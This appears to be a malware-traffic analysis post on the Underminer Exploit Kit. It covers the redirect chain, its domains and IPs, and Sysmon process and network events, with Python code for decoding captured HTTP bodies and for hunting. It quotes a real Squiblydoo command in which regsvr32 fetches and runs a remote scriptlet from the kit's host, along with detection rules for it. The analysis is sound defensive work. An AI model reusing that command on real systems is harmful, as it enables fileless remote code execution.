Example traffic of the Underminer Exploit Kit and how it interacts with an infected host

I have added a zipped pcap file for your analysis. The password for the zipped pcap is "infected" (all lowercase).

PCAP file of the infection traffic:
2020-02-16-Underminer-EK-pcap.zip


ASSOCIATED DOMAINS:

167.88.61.197 Port 443 – mt.coolsite.best – Redirect to Underminer Exploit Kit
38.114.114.125 Port 443 – user.shorico.club – Underminer Exploit Kit



Shown above: Redirect and network traffic associated with the Underminer Exploit Kit



Shown above: The malvertising redirect response is gzip-encoded. Using Wireshark's export feature, the gzip body can be written out to a file for further analysis.



Shown above: The decoded gzip body contains a redirect to mt.coolsite.best, which in turn redirects to the Underminer Exploit Kit.
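The decoding step above can be scripted once the body has been exported from Wireshark. The following is an added example, not code from the original post: it takes an exported HTTP body, decompresses it if it is gzip or deflate encoded, and pulls out the JavaScript, meta-refresh and iframe redirect targets. The sample page is constructed here (it only reuses the mt.coolsite.best domain from the traffic above; the HTML and the path are not taken from the pcap).

```python
import gzip
import re
import zlib

# Constructed sample: a small redirect page of the kind the malvertising chain
# returns, compressed the way the server sends it (Content-Encoding: gzip).
# Only the domain comes from the capture; the page content is made up.
SAMPLE_HTML = (
    b"<html><head><title>ad</title></head><body>"
    b"<script>window.location.href='https://mt.coolsite.best/';</script>"
    b"</body></html>"
)
SAMPLE_GZIP_BODY = gzip.compress(SAMPLE_HTML)

# The same page as a zlib stream and as raw deflate, the two encodings that
# servers send under "Content-Encoding: deflate".
SAMPLE_ZLIB_BODY = zlib.compress(SAMPLE_HTML)
_raw = zlib.compressobj(wbits=-zlib.MAX_WBITS)
SAMPLE_RAW_DEFLATE_BODY = _raw.compress(SAMPLE_HTML) + _raw.flush()

GZIP_MAGIC = b"\x1f\x8b"


def decode_body(raw: bytes) -> bytes:
    """Return the decompressed HTTP body for a gzip or deflate encoded payload.

    Bytes that are not compressed at all are returned unchanged, so the
    function can be run blindly over every exported object.
    """
    if raw[:2] == GZIP_MAGIC:
        return gzip.decompress(raw)
    # "deflate" is sometimes a zlib stream (with header) and sometimes raw
    # deflate; try both before concluding the body is plain.
    for wbits in (zlib.MAX_WBITS, -zlib.MAX_WBITS):
        try:
            return zlib.decompress(raw, wbits)
        except zlib.error:
            continue
    return raw


# Common ways a landing page hands the browser off to the next hop.
REDIRECT_PATTERNS = [
    re.compile(r"""(?:window\.|document\.)?location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""", re.I),
    re.compile(r"""location\.replace\(\s*['"]([^'"]+)['"]""", re.I),
    re.compile(r"""http-equiv\s*=\s*['"]refresh['"][^>]*url\s*=\s*['"]?([^'">]+)""", re.I),
    re.compile(r"""<iframe[^>]+src\s*=\s*['"]([^'"]+)['"]""", re.I),
]


def find_redirects(body: bytes) -> list:
    """Extract redirect targets from a decoded HTML body, in order of appearance."""
    text = body.decode("utf-8", errors="replace")
    found = []
    for pattern in REDIRECT_PATTERNS:
        for match in pattern.finditer(text):
            url = match.group(1)
            if url not in found:
                found.append(url)
    return found


def analyze_exported_body(raw: bytes) -> list:
    """Decode an exported HTTP object and return the redirect URLs it contains."""
    return find_redirects(decode_body(raw))


if __name__ == "__main__":
    for url in analyze_exported_body(SAMPLE_GZIP_BODY):
        print("redirect ->", url)
```

Run it against a body exported from Wireshark by reading the file into `analyze_exported_body`. The gzip check uses the 1f 8b magic bytes rather than trusting the Content-Encoding header, because the header is not part of the exported object and servers occasionally mislabel the encoding.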



Shown above: The Underminer Exploit Kit host presents a TLS certificate issued by the Let's Encrypt certificate authority with a subject of user.shorico.club. The certificate is visible in the handshake because the session negotiated TLS 1.2; under TLS 1.3 the server certificate is encrypted, and the SNI field of the Client Hello is the remaining place to see the hostname in the clear.


SOME ASSOCIATED PROCESS BEHAVIOR FOR HUNTING ENDPOINTS:

A good indicator of malicious activity is a browser process (iexplore.exe here, but any browser) spawning regsvr32.exe, powershell.exe, or cmd.exe. In this case regsvr32.exe is launched with /s /i:<URL> scrobj.dll, which makes the signed Microsoft binary fetch and execute a remote scriptlet (.sct) file without writing a DLL to disk; the technique is commonly known as Squiblydoo.

[Sysmon Event 1 – Process Creation]
Image C:\Windows\System32\regsvr32.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Microsoft(C) Register Server
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine "C:\Windows\System32\regsvr32.exe" /s /i:"https://user.shorico.club/views/6ke4ua62j0vmgeq6ld84ri257o.sct" scrobj.dll
CurrentDirectory C:\Users\Jack\Desktop\
User Jack-PC\Jack
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
ParentCommandLine "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3032 CREDAT:144385 /prefetch:2

Another good indicator of malicious activity is regsvr32.exe making an outbound network connection, particularly to a public IP address over port 443; registering a local DLL gives it no reason to talk to the internet. Note that Sysmon only records Event ID 3 when network connection logging is enabled (the -n switch or a NetworkConnect rule in the configuration), so confirm it is turned on before relying on this hunt.

[Sysmon Event 3 – Network Connection]
Image C:\Windows\System32\regsvr32.exe
User Jack-PC\Jack
Protocol tcp
SourceIp 192.168.4.88
SourceHostname
SourcePort 49375
SourcePortName
DestinationIp 38.114.114.125
DestinationHostname 125-114-114-38.clients.gthost.com
DestinationPort 443
DestinationPortName https
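The two hunting indicators above (a browser spawning regsvr32.exe, powershell.exe or cmd.exe, and regsvr32.exe connecting outbound) can be expressed as a small set of checks over Sysmon events. The following is an added example, not part of the original post or any vendor tooling: it parses events written in the "Field Value" layout shown above and runs three rules over them. The first two sample events reuse the values quoted above; the third, a benign regsvr32.exe launched by msiexec.exe to register a local DLL, is constructed here to show the rules do not fire on ordinary use. The browser list beyond iexplore.exe is an assumption.

```python
import ipaddress
import ntpath
import re

# Assumed browser set; the post only shows iexplore.exe.
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
SUSPECT_CHILDREN = {"regsvr32.exe", "powershell.exe", "cmd.exe"}

# Constructed sample events in the "Field Value" layout used above.
SAMPLE_EVENTS = [
    # Taken from the process creation event quoted above.
    """[Sysmon Event 1 - Process Creation]
Image C:\\Windows\\System32\\regsvr32.exe
CommandLine "C:\\Windows\\System32\\regsvr32.exe" /s /i:"https://user.shorico.club/views/6ke4ua62j0vmgeq6ld84ri257o.sct" scrobj.dll
User Jack-PC\\Jack
ParentImage C:\\Program Files\\Internet Explorer\\iexplore.exe
""",
    # Taken from the network connection event quoted above.
    """[Sysmon Event 3 - Network Connection]
Image C:\\Windows\\System32\\regsvr32.exe
User Jack-PC\\Jack
Protocol tcp
SourceIp 192.168.4.88
SourceHostname
DestinationIp 38.114.114.125
DestinationPort 443
""",
    # Constructed benign event: an installer registering a local DLL.
    """[Sysmon Event 1 - Process Creation]
Image C:\\Windows\\System32\\regsvr32.exe
CommandLine "C:\\Windows\\System32\\regsvr32.exe" /s "C:\\Program Files\\Example\\example.dll"
User Jack-PC\\Jack
ParentImage C:\\Windows\\System32\\msiexec.exe
""",
]

# Matches /i:<url> whether or not the URL is quoted, as in the event above.
REMOTE_SCRIPTLET = re.compile(r'/i:"?https?://', re.I)


def parse_sysmon_block(text: str) -> dict:
    """Turn a block of 'Field Value' lines into a dict; the header sets EventId."""
    event = {}
    for line in text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        header = re.match(r"\[Sysmon Event\s*(\d+)", line)
        if header:
            event["EventId"] = int(header.group(1))
            continue
        key, _, value = line.partition(" ")
        event[key] = value.strip()
    return event


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerating surrounding quotes."""
    return ntpath.basename(path.strip('"')).lower()


def is_public(ip: str) -> bool:
    """True for globally routable addresses; private, loopback and link-local are False."""
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:
        return False


def check_event(event: dict) -> list:
    """Return a description for each hunting rule the event trips."""
    hits = []
    image = basename(event.get("Image", ""))
    if event.get("EventId") == 1:
        parent = basename(event.get("ParentImage", ""))
        if parent in BROWSERS and image in SUSPECT_CHILDREN:
            hits.append(f"browser {parent} spawned {image}")
        cmd = event.get("CommandLine", "")
        if image == "regsvr32.exe" and "scrobj.dll" in cmd.lower() and REMOTE_SCRIPTLET.search(cmd):
            hits.append("regsvr32 loading a remote scriptlet via scrobj.dll")
    elif event.get("EventId") == 3:
        if image == "regsvr32.exe" and is_public(event.get("DestinationIp", "")):
            hits.append(f"regsvr32 connected to {event['DestinationIp']}:{event.get('DestinationPort', '?')}")
    return hits


def hunt(blocks: list) -> list:
    """Run every rule over every event block; returns (index, hit) pairs."""
    results = []
    for index, block in enumerate(blocks):
        for hit in check_event(parse_sysmon_block(block)):
            results.append((index, hit))
    return results


if __name__ == "__main__":
    for index, hit in hunt(SAMPLE_EVENTS):
        print(f"event {index}: {hit}")
```

The network rule keys on the destination being a public address rather than on port 443, since the exploit kit traffic here is indistinguishable from any other HTTPS by port alone; the scriptlet rule looks for the /i: URL and scrobj.dll pair so that a benign registration of a local DLL, as in the third sample, produces no hit.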